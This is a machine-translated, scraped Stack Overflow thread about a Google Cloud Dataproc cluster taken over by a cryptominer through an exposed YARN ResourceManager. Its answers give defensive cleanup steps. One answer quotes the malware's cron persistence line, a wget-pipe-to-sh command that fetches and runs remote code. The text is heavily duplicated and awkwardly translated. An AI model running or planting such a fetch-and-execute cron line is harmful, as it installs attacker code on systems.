Fatal编程技术网

Google cloud platform 谷歌云数据处理病毒CrytalMiner(who博士)

google-cloud-platform

Google cloud platform 谷歌云数据处理病毒CrytalMiner(who博士),google-cloud-platform,google-cloud-dataproc,Google Cloud Platform,Google Cloud Dataproc,创建dataproc群集后,许多作业将由用户dr.who自动提交给ResourceManager。这将耗尽集群的资源,并最终将集群压得喘不过气来 日志中几乎没有信息 是否有其他人在dataproc中遇到此问题?不知道更多信息,以下是我怀疑发生的情况 听起来你的集群已经被破坏了 您的防火墙网络规则可能已打开,允许任何流量进入群集 有人发现您的群集对公共internet开放,并正在利用它 我建议您立即执行以下操作: 保护您正在使用的设备,以防止外部访问;不要打开公共internet的端口 如果您没有

创建dataproc群集后,许多作业将由用户dr.who自动提交给ResourceManager。这将耗尽集群的资源,并最终将集群压得喘不过气来

日志中几乎没有信息

是否有其他人在dataproc中遇到此问题?

不知道更多信息,以下是我怀疑发生的情况

听起来你的集群已经被破坏了 您的防火墙网络规则可能已打开,允许任何流量进入群集 有人发现您的群集对公共internet开放,并正在利用它 我建议您立即执行以下操作:

保护您正在使用的设备,以防止外部访问;不要打开公共internet的端口 如果您没有使用Cloud Dataproc群集,请删除它们 如果您在该集群上有任何工作或数据,则应考虑到任何人都可以访问集群的情况下,数据可能受到损害。
如果您需要访问集群上的WebUI,您应该使用。

在不知道更多信息的情况下,以下是我怀疑发生的情况

听起来你的集群已经被破坏了 您的防火墙网络规则可能已打开,允许任何流量进入群集 有人发现您的群集对公共internet开放,并正在利用它 我建议您立即执行以下操作:

保护您正在使用的设备,以防止外部访问;不要打开公共internet的端口 如果您没有使用Cloud Dataproc群集,请删除它们 如果您在该集群上有任何工作或数据,则应考虑到任何人都可以访问集群的情况下,数据可能受到损害。 如果您需要访问群集上的WebUI,则应使用。

您可能遇到的问题:

黑客扫描每个打开的漏洞IP地址+端口,并将其存储到漏洞表中 黑客扫描破坏表,试图找出您最近是否启动了集群 当一个易受攻击的集群可用时,黑客连接到该集群,一切都是开放的,并且发现了一个漏洞! 这个家伙连接到你的集群,删除我的所有内容,脚本名为zz.sh,你可以在下面的BitBucket链接中找到它,然后下载挖掘应用程序 纱线认为工人们正在失败,但我甚至不认为Hadoop应用程序正在运行。 我建议您尝试在错误日志中查找bitbucket/github地址。您还可以尝试查找get/wget/apt get/curl命令

我猜他现在很有钱了

两件重要的事情:

检查您的安全组配置是否足够强大,并且没有任何公共授权 检查您的SSH密钥是否未泄露。 您需要做的是:

其想法是使用更新的安全组策略阻止不必要的开放端口,并在需要时使用VPC。我将描述第一个选项以及要遵循的主要步骤

[可选]更改SSH密钥注意:这很容易破坏系统中的内容,请小心操作 转到EC2屏幕>网络和安全>安全组 创建一个新的安全组,并仅从主机及其节点配置可能的连接。您可以将输入连接设置为来自给定的安全组。 启动新的EC2/EMR实例时,请使用第3节中描述的安全组。在检查群集安全配置时,应该会出现此消息 相关的:

你可能会想到什么:

黑客扫描每个打开的漏洞IP地址+端口,并将其存储到漏洞表中 黑客扫描破坏表,试图找出您最近是否启动了集群 当一个易受攻击的集群可用时,黑客连接到该集群,一切都是开放的,并且发现了一个漏洞! 这个家伙连接到你的集群,删除我的所有内容,脚本名为zz.sh,你可以在下面的BitBucket链接中找到它,然后下载挖掘应用程序 纱线认为工人们正在失败,但我甚至不认为Hadoop应用程序正在运行。 我建议您尝试在错误日志中查找bitbucket/github地址。您还可以尝试查找get/wget/apt get/curl命令

我猜他现在很有钱了

两件重要的事情:

检查您的安全组配置是否足够强大,并且没有任何公共授权 检查您的SSH密钥是否未泄露。 您需要做的是:

其想法是使用更新的安全组策略阻止不必要的开放端口,并在需要时使用VPC。我将描述第一个选项以及要遵循的主要步骤

[可选]更改SSH密钥注意:这很容易破坏系统中的内容,请小心操作 转到EC2屏幕>网络和安全>安全组 创建一个新的安全组,并仅从主机及其节点配置可能的连接。您可以将输入连接设置为来自给定的安全组。 使用s 在启动新的EC2/EMR实例时,安全组如第3节所述。在检查群集安全配置时,应该会出现此消息 相关的:

这种病毒是一种加密货币,它创造了数以千计的who博士职位,就像你所描述的那样。如果您试图删除加密矿工,则需要重新安装它。以下是如何永久移除矿工

检查每个节点上可疑的cron作业,并将其删除

$ sudo -u yarn crontab -e
*/2****wget-q-O-| sh>/dev/null 2>&1

然后检查像这样的java进程并杀死它

/var/tmp/java-c/var/tmp/wc.conf

您还需要保护群集的所有传入端口,以防止这种情况再次发生。尤其是您的资源管理器端口

有关更多信息,请参见此

该病毒是一个加密货币矿工,它创造了数千个像你所描述的那样的世界卫生组织博士职位。如果您试图删除加密矿工,则需要重新安装它。以下是如何永久移除矿工

检查每个节点上可疑的cron作业,并将其删除

$ sudo -u yarn crontab -e
*/2****wget-q-O-| sh>/dev/null 2>&1

然后检查像这样的java进程并杀死它

/var/tmp/java-c/var/tmp/wc.conf

您还需要保护群集的所有传入端口,以防止这种情况再次发生。尤其是您的资源管理器端口

有关更多信息,请参见此

GCP: 如果您必须更改您的安全组,则默认设置为:ssh使其成为tcp:22 .我想这会帮助你解决你的问题。

GCP: 如果您必须更改您的安全组,则默认设置为:ssh使其成为tcp:22
.我想它会帮助你解决你的问题。

这听起来像病毒。从AWS上的几个星期开始,这里似乎也有类似的情况。你从什么时候开始发布start的?可能的复制品听起来像病毒。从AWS上的几个星期开始,这里似乎也有类似的情况。您从什么时候开始发布start?可能重复我在aws emr集群上面临相同的问题。你能不能写一份详细的指南来说明如何对付这些攻击。特别设置VPC等,或者如何阻止AWS上的开放端口。谢谢@user238607刚刚用指南更新了我的答案。如果我在aws emr集群上面临同样的问题,请毫不犹豫地向上投票。你能不能写一份详细的指南来说明如何对付这些攻击。特别设置VPC等,或者如何阻止AWS上的开放端口。谢谢@user238607刚刚用指南更新了我的答案。如果有帮助,请毫不犹豫地向上投票